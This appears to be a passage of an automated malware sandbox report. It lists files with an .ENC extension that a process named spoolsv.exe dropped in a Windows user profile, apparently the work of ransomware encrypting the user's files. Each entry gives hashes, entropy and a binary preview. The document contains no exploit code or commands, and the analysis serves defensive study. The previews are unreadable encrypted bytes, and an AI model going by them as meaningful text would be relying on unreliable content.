                                                                                                                                                                                                                                                      Preview:(..b.r.d@...;.D..K.d.z.r.....X.t...~.n.c.= ...D.0.}..r...JYZ.k.:\..&B..%.64...4dP3..e.I.=..&.l.....!\D.LO.....k.......z.zx..p..;.q.-.$..lf....I.w.N....-.v._.......u............&~-w.]G\.x8.Fw'.......I..0..RO....Y%..t^.hF...S...~t..[1?..C.4l..U.m..^~.CO...M...W......pI......'|.....Z@..62.}.....x}..^F....gl.B..v.g7*..K.!..^....9y$j.(..i...p.L..X.K6....{i.1X{...p.....x1w.:W{.W.p;5o.?...:.....>}sM.#.."./..P.b"w6@....?.h.h.g.G....0.f....bd..=..\..?7...Ex.?...9q...D....;..U.<.y..s.Tim..}..."........).t.|..G4..Vn.x'..@.S)q.0.WO...f"...D.{_l..p.s..u..6r85.......V.N.f.....]...}[c.....]..F...`K.F2....tf"ce{....)1.:.f.aIM.`W..R..L....:h..`|.J&...<~?.Z0> gpE..2.zd:-.....`.....nE...z.....d...f.I...w=:_ ......c.o..O..i;...B;$.y..h.KI..y3...M....q.9_z63q.../...6..? ]V.>I.A.?z.|....Ko.~....?7..N.....DLt.!T.jO.....7......]fb ..,f...3l.p..$6..sjLB.L.Z*C...ERl/..l.Fa.6Q.....=a.L.=.Z.....f...^..\f.%.r.-.mB ........`.d...0&....F.u...?<w.......+v.%@V..[.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WinX\Group3\06 - SystemAbout.lnk.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1584
                                                                                                                                                                                                                                                      Entropy (8bit):7.882470166379022
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:Ibn+U9gzEPw94xoKqRN61GKFBBlfeosDKA7kSxs7udkR3aK9qHS52hoxqOwMbs9:IbnV9gzosN2FbstBxs7GwxESVbs9
                                                                                                                                                                                                                                                      MD5:D7FAC58D38A87E5DB7274393600D4F5C
                                                                                                                                                                                                                                                      SHA1:A56FAA3982A14A6DB60891147E44556A108B3916
                                                                                                                                                                                                                                                      SHA-256:AF5E973B9E98F6121BBCFEC8C6703E78095A487892BBE6F9B8C1929581799E7D
                                                                                                                                                                                                                                                      SHA-512:999DCA12453B20E42107496470D63020D18A1FBAC5A8BEFCA3B76FD1CADADE4CA61799DC5377970FC5E43953FB5A231B5D099E44A4D7813DEAD5CADDAFBCE32F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:(..b.r.d@...;.D.Q..&,.?.}.u.@w..8.A..VQ...Wt.]..i.....0.....{.vHC7S...b....u\K.o..?<p(..c.."#.7t5.lp.s..K...U...H..:...R...........+rh.:....d_;.....B%.C..6X.4T{..AhWHpnl.V|...........U..5..[y..<?...n..6..c.Bw...].d.nm....zkI......{..[..d]U....>X.Ft.S$_]a....Ck..W....uo\.z..,...u..J.4...]c.P.e~.n.&...;v.0q.,....`..5..UR......W....ky.){+.$...e.R.$y>M. .1...m...?..].V[....F*."X.../,n.<..D.8../.........f..ya...0....@....<.B.j.....id.O#0..S...z<W................qw........*h.D ..]I.PIV.bT_c..^i..--.....y=.p..%..I.'...n..JO............B.Z...%.bZP.....F..N.VHmF.o..tf:..Z.$+...Qx..i..W........n..pD.....=c.[.....,.L....~............]u.Sx..y;*......0...H.w..q.".$ ..'B.M.......]..ep_....4(.....al.j%KA...:|._[.!.7>4..X..S9B.?.....,$.G...L.!..z.....P.c..s..^.~.\...WD..t..l&]%....i...)......W..+/........LDt]...|..K....Y.6.&J.k.l........3.$..C.l..S.u..m.-../sw~IZ...e1:zY.s....Q.I...).z..D.F.kD..-{..-.d.0.......p.q.b8........QZk5.l....Gq).#..P1..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WinX\Group3\07 - Event Viewer.lnk.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1024
                                                                                                                                                                                                                                                      Entropy (8bit):7.853269325478708
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:Ibndc5RTrqXphzi4JGL+ry726NWBVu31tiTHGaquDDc:Ibnd89qMiPVmtiTHGduDI
                                                                                                                                                                                                                                                      MD5:153E3902F7172FBDC79D944A8887CADE
                                                                                                                                                                                                                                                      SHA1:17BBADA57B6F7FB74652C767C5A18B0DA314E685
                                                                                                                                                                                                                                                      SHA-256:D0AC5B957622F9B0DFD4E1B7CEF92698F89A3BD2946FD75157C979354E7CB502
                                                                                                                                                                                                                                                      SHA-512:736AE69E3BAE3F59B068A50D37481608811A6411460720490626F8B2048B5BA63C17D6F63E71F6454B79B371AC40A7EFF5E776DC212AEB6EBCD2C67E29A19243
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:(..b.r.d@...;.D..K.d.z.r.....X.t...~.n.c.= ...D.0.}..r...JYZ.k.:\..&B..%.64...4dP3..e.I.=..&.l.....!\D.LO.....k.......z.zx..p..;.q.-.$..lf....I.w.N....-.v._.......u............&~-w.]G\.x8.Fw'..........[l..e.H\..+....M..-N.8..L.w.R..|Fr.......(.X`r^p."...A..?...Ps~Y..K...^...)xQ.k.'.]..`..m....~.r.B.t.[M....(9..Ns..T.....R.....s#.....[....l.?..+g.-..%.J]....HyhV'.8.O..'...D......>....H..:."....k..i........\.Uc9....C(...0cVh/k@.9Mt9...V.U..cL....^m~...i......m..n.YiJO.Rgh.i./....F....~?fE&B.l....I!.."...3OV.U.kj"..}.@3..^zF...yn..........'!.<n.c.k|5.[.v.be.6...z.i.....y...-%eu.4..E..#B...NG..h.~[>..^ ..\L..F.5/.......!..t.i&w.|`.".....h3.S..np...\/.Wo.b.K..@....'v1H..<.CD$.&k.7._.b.|*..t.xl.....#V...HYf.2.W.,..du..Q..k. ....L......=.a...|[....Z...S.....v.g...q...Zf.e .......j...F..x.......`6..).O.,A..5.G.\......6......H....W.Y{vo..............$.q.C..tMj.c.N.Mg:..@..G...2D...........).t.x..T.N,...p.T.M..Tdw......7.._.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WinX\Group3\08 - PowerAndSleep.lnk.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1584
                                                                                                                                                                                                                                                      Entropy (8bit):7.885553027533049
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:IbnV9gzosN2FbstBxs7Gwx1kanqaPPqrGf1e:0Yojot47Gw7HqcPhI
                                                                                                                                                                                                                                                      MD5:BB97EE4ACCAD08BDF6C305C4E7DA97F4
                                                                                                                                                                                                                                                      SHA1:EFE6CAAA67EA39F8B2759FF0C0BE8B79C9EBBF4F
                                                                                                                                                                                                                                                      SHA-256:1F495E2DD76D88CFFD075F7C93543518905D271AE9D460A7EEA0CDE516AC78EE
                                                                                                                                                                                                                                                      SHA-512:ED00139CE9434D2FD35BC5B6220DD798751213944BBDA7AA6E14C399A5F72B288F5CE813218D26286AC35BDB92FDC1738C02E696F9014EC6170B2EDD15F87751
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:(..b.r.d@...;.D.Q..&,.?.}.u.@w..8.A..VQ...Wt.]..i.....0.....{.vHC7S...b....u\K.o..?<p(..c.."#.7t5.lp.s..K...U...H..:...R...........+rh.:....d_;.....B%.C..6X.4T{..AhWHpnl.V|...........U..5..[y..<?...n..6..c.Bw...].d.nm....zkI......{..[..d]U....>X.Ft.S$_]a....Ck..W....uo\.z..,...u..J.4...]c.P.e~.n.&...;v.0q.,....`..5..UR......W....ky.){+.$...e.R.$y>M. .1...m...?..].V[....F*."X.../,n.<..D.8../.........f..ya...0....@....<.B.j.....id.O#0..S...z<W................qw........*h.D ..]I.PIV.bT_c..^i..--.....y=.p..%..I.'...n..JO............B.Z...%.bZP.....F..N.VHmF.o..tf:..Z.$+...Qx..i..W........n..pD.....=c.[.....,.L....~............]u.Sx..y;*......0...H.w..q.".$ ..'B.M.......]..ep_....4(.....al.j%KA...:|._[.!.7>4..X..S9B.?.....,$.G...L.!..z.....P.c..s..^.~.\...WD..t..l&]%....i...)......W..+/........LDt]...|..K....Y.6.&J.k.l........3.$..C.l..S.u..m.-../sw~IZ...e1:zY.s....Q.I...).z..D.F.kD..-{..-.d.0.......p.q.b8........QZk5.l....Gq).#..P1..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):944
                                                                                                                                                                                                                                                      Entropy (8bit):7.784979408952368
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:anB1QBTm8QdYDLn/sKLnhsocxkr9pSfl1HvzV4Dk:aWkOseOocMjWzHR4Dk
                                                                                                                                                                                                                                                      MD5:F7DFCBD835BC2186FC820583682C14E7
                                                                                                                                                                                                                                                      SHA1:7DC03FDF192BD0C564FD42A0666DE0BD2E048512
                                                                                                                                                                                                                                                      SHA-256:228F9C863AC78231C91F426B4E87D58EB320DEF90F6F262CE920C9AD127AE7D6
                                                                                                                                                                                                                                                      SHA-512:9ABB96113DFB92F8990E03001EB4AF749ACF9EBB2EE13EBD6A9D259D1035AC3FFD11BEE7D82A80CC0CC6F9DE34218F63EC4638CF62330F8468BF02CB6A7E0F4D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:U8D...2..9.*y.XJz...'{.....g.[?U...Iw.sG.BK.0..Fx...yk..........%..?.[..,.....'j..=........&..".27......M..]O.}.;2.ec%C..'...D 5u.U..>{.... M.U...Z.....r?[.)..o@;.k..UE..wq.^.O....*.,X.W..yB..aV9D. ..?8$........7}.. ..V.a.~x8.YP...t....5._9..........A.}.?<.V.....`.[U;.W!U....(......o.xN.6...~'.?l..M....)#K..c.%....q]X{h%.eZ.P...U.MRS}..r57m}.(....:z.(...$.]....(.b..,r.s...Ybu..r..|ar4.<.>*.Ad.t.v. 5.Zwo.y*.......jC.Uu.........A......R|$..4Cs]wW.....C.t-.W...Ru.L...R..^....X..n.....K...V..o...!.k<'.*...V...W.R...[.0...<...q.=>..Q_.W$RR..f..M.P.C.../.r......}...L.....w}....;x.5......[b..m........y\....WQ1.M...r_.>.k...g..D#.gT.....`7..(.;..;...<.............r.n...'Q.Q.M..Q;...((.]...C..>...e.+Q..@}8...){.....].d.r..Z..(......t...I..v.6...`W.........2..g...A..^..i&T M.5-I....W-l.".5E....h.M..7..h..n.*..P...M......;...pe%..J.z....._N....`.UG..v.....!....@=.c=....+."_U....ms..z ...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.549981C3F5F10_8wekyb3d8bbwe\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.549981C3F5F10_8wekyb3d8bbwe\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.972590433206988
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:tM++aSKNc6IyKNMmOYxC6/M1Bzw6+LYYvnTYbd:tVSCxKN7OYk1BuvMR
                                                                                                                                                                                                                                                      MD5:1B92E669C7BFB99C08E6F4D4DE6615AD
                                                                                                                                                                                                                                                      SHA1:85D7918A8FE68C54707ED93715253237489FF284
                                                                                                                                                                                                                                                      SHA-256:00B2DEB7104ABC3C93914C4FCABF1A93A6CFC48EC766D52B01595CB607A50925
                                                                                                                                                                                                                                                      SHA-512:CD3D7CEA9E0D42C7B8DF1C52BC3AF234E9BBD1ADA14B16F07AB984440F131A7279248641E95F0097B4587EF0C8C627C4BFB76B5260F6A2343342578B1C41C4C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:?.C`...g#.......{Y}B.*..GI.q.G]...r{}.1..D....6.Q.y......2.'*..G..v.7UA.4.9S.....-......}.n....2..\k..5.]_ \..ul.0....8,.)$...Ge..M=. ....a...fNq.....N...O*...-..NEI...R}v;@.....Ej_hGQZ}`.......P..h...<....j....'..;.L.....UL...<....b..P.B.A..a.w.^N0.O..9..D..~....g...C .u....O.(..G.&....IW.1..^.E.^.T....+*c.NK..C.nKyW.$.Bt...E...&......=....&h.(9.9.. .l%..Z...Jf7.....>T.~..v.....'..pCl.2..*].0AG(..".Sv.A....0...M..f/.RS.....+<...uJ...'..t1...l....W..*.6.mn..\....D..'F..@.K....E.]E.CN...l.<...k.v..G.'.WC.....;. .......}#>..ZG._..a.....Tn.J.8C.U....(.%F....k.M8.g...].".~.....^.j..e.......c@{^..h..I....b<..1<..=..YH..?T..|. .))...8......1....y.D.. ~.J.. (.....E.......f.f......yR{G....4r.....^2.xp....;.......*.^|..o.....O....`}..*C.A....`....`h./*..[..'p.F+#yv.~..\....2..|.......}..@.j....q......K..v................4m...l...B%.....R..&...e3.....Xp.ZtOM08.8.C....6.n.&U.."3...."@..$6.A.E.'.....H/...N....2;.F[.a.....e.o.i\Q..$.....a.{R.J/'..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.975853869200302
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:DMFgL/dbujaIvGomlx8vs/V6owPBcLkEMG0x93ho5Wm:eghajPGoml6vsgowPBcLkEM3xI8m
                                                                                                                                                                                                                                                      MD5:524ADDA1FA92E59EFF97996D13D843B9
                                                                                                                                                                                                                                                      SHA1:3C877F468FDCE939D65997A5D212A71D9F588BD2
                                                                                                                                                                                                                                                      SHA-256:5127FBAD654E05CF8A217685E34736F8CAE3A619DBA1E366FCB631A2C115C630
                                                                                                                                                                                                                                                      SHA-512:1D74F3F75A22537579DE5EFE101008679DA80CCB1662387BFD64A70A9A89F3050ED405E4E17864F2203451433E63438A75333749BE777195D991558E3162B581
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:^DA...6.w$.e1...+.;...N.....w.n.....N...!P.c(...J.A.g..Y.X.E.(J...H&..A.........|...`.E.fR..w.-.V>s_.?.yB.6....E.F....4.O.?...\.-.bQk..3fB8.oq...b.....RY..P.4..w.......M....#:.kS.j.>...HRY.....`,~.i...iY.|....0.G.^.1..`.J;2......._..aq..0f.5Xo-.&R.^.....=....q.l..v..R........@..i..O`Qfz|4.g.>..".........O>.0..|7.o;...N"E.. ....'F.zk@.*.5..h.......a.O.q..iN..?..W.gT%s...[v*.A.,.i...%.....{u.K.*O.9...bo+.;cUG*\...).<..81..... T/.9_.......<.).YS*v..f..3.l/.3:..P....8m.+J.!."..<.."0.....s=..}.3........K.=...z.bQ...1......x.L...|...l.Qy...........i.=~2"].va.~P0..|..l...e...A..e.........#.....%z5.Y..q....1...F..<.a.|?.......!'KL/x....q.Xi..x".*....{.A...u....Y...'(...,.....o..C.$.... ....w..;6.q.-.9.+...g..M...dA.3..i....8...J."%..-.U........qk}+.m#...R...i....T_..P.O_......tp...5..].......{..ue.|`~..B..x.a%.....l'...Eg.d.dW^.x.u..(...d....~...3....ho..a6..^..8.D....v.......Eq.N.8y.Y...:...7.2..h.).xM.Z2.L7..5..j........cZ?'..W..../.&

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.972590433206988
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:tM++aSKNc6IyKNMmOYxC6/M1Bzw6+LYYvnTYbd:tVSCxKN7OYk1BuvMR
                                                                                                                                                                                                                                                      MD5:1B92E669C7BFB99C08E6F4D4DE6615AD
                                                                                                                                                                                                                                                      SHA1:85D7918A8FE68C54707ED93715253237489FF284
                                                                                                                                                                                                                                                      SHA-256:00B2DEB7104ABC3C93914C4FCABF1A93A6CFC48EC766D52B01595CB607A50925
                                                                                                                                                                                                                                                      SHA-512:CD3D7CEA9E0D42C7B8DF1C52BC3AF234E9BBD1ADA14B16F07AB984440F131A7279248641E95F0097B4587EF0C8C627C4BFB76B5260F6A2343342578B1C41C4C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:?.C`...g#.......{Y}B.*..GI.q.G]...r{}.1..D....6.Q.y......2.'*..G..v.7UA.4.9S.....-......}.n....2..\k..5.]_ \..ul.0....8,.)$...Ge..M=. ....a...fNq.....N...O*...-..NEI...R}v;@.....Ej_hGQZ}`.......P..h...<....j....'..;.L.....UL...<....b..P.B.A..a.w.^N0.O..9..D..~....g...C .u....O.(..G.&....IW.1..^.E.^.T....+*c.NK..C.nKyW.$.Bt...E...&......=....&h.(9.9.. .l%..Z...Jf7.....>T.~..v.....'..pCl.2..*].0AG(..".Sv.A....0...M..f/.RS.....+<...uJ...'..t1...l....W..*.6.mn..\....D..'F..@.K....E.]E.CN...l.<...k.v..G.'.WC.....;. .......}#>..ZG._..a.....Tn.J.8C.U....(.%F....k.M8.g...].".~.....^.j..e.......c@{^..h..I....b<..1<..=..YH..?T..|. .))...8......1....y.D.. ~.J.. (.....E.......f.f......yR{G....4r.....^2.xp....;.......*.^|..o.....O....`}..*C.A....`....`h./*..[..'p.F+#yv.~..\....2..|.......}..@.j....q......K..v................4m...l...B%.....R..&...e3.....Xp.ZtOM08.8.C....6.n.&U.."3...."@..$6.A.E.'.....H/...N....2;.F[.a.....e.o.i\Q..$.....a.{R.J/'..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.972590433206988
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:tM++aSKNc6IyKNMmOYxC6/M1Bzw6+LYYvnTYbd:tVSCxKN7OYk1BuvMR
                                                                                                                                                                                                                                                      MD5:1B92E669C7BFB99C08E6F4D4DE6615AD
                                                                                                                                                                                                                                                      SHA1:85D7918A8FE68C54707ED93715253237489FF284
                                                                                                                                                                                                                                                      SHA-256:00B2DEB7104ABC3C93914C4FCABF1A93A6CFC48EC766D52B01595CB607A50925
                                                                                                                                                                                                                                                      SHA-512:CD3D7CEA9E0D42C7B8DF1C52BC3AF234E9BBD1ADA14B16F07AB984440F131A7279248641E95F0097B4587EF0C8C627C4BFB76B5260F6A2343342578B1C41C4C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:?.C`...g#.......{Y}B.*..GI.q.G]...r{}.1..D....6.Q.y......2.'*..G..v.7UA.4.9S.....-......}.n....2..\k..5.]_ \..ul.0....8,.)$...Ge..M=. ....a...fNq.....N...O*...-..NEI...R}v;@.....Ej_hGQZ}`.......P..h...<....j....'..;.L.....UL...<....b..P.B.A..a.w.^N0.O..9..D..~....g...C .u....O.(..G.&....IW.1..^.E.^.T....+*c.NK..C.nKyW.$.Bt...E...&......=....&h.(9.9.. .l%..Z...Jf7.....>T.~..v.....'..pCl.2..*].0AG(..".Sv.A....0...M..f/.RS.....+<...uJ...'..t1...l....W..*.6.mn..\....D..'F..@.K....E.]E.CN...l.<...k.v..G.'.WC.....;. .......}#>..ZG._..a.....Tn.J.8C.U....(.%F....k.M8.g...].".~.....^.j..e.......c@{^..h..I....b<..1<..=..YH..?T..|. .))...8......1....y.D.. ~.J.. (.....E.......f.f......yR{G....4r.....^2.xp....;.......*.^|..o.....O....`}..*C.A....`....`h./*..[..'p.F+#yv.~..\....2..|.......}..@.j....q......K..v................4m...l...B%.....R..&...e3.....Xp.ZtOM08.8.C....6.n.&U.."3...."@..$6.A.E.'.....H/...N....2;.F[.a.....e.o.i\Q..$.....a.{R.J/'..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.972590433206988
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:tM++aSKNc6IyKNMmOYxC6/M1Bzw6+LYYvnTYbd:tVSCxKN7OYk1BuvMR
                                                                                                                                                                                                                                                      MD5:1B92E669C7BFB99C08E6F4D4DE6615AD
                                                                                                                                                                                                                                                      SHA1:85D7918A8FE68C54707ED93715253237489FF284
                                                                                                                                                                                                                                                      SHA-256:00B2DEB7104ABC3C93914C4FCABF1A93A6CFC48EC766D52B01595CB607A50925
                                                                                                                                                                                                                                                      SHA-512:CD3D7CEA9E0D42C7B8DF1C52BC3AF234E9BBD1ADA14B16F07AB984440F131A7279248641E95F0097B4587EF0C8C627C4BFB76B5260F6A2343342578B1C41C4C1
                                                                                                                                                                                                                                                      Malicious:false
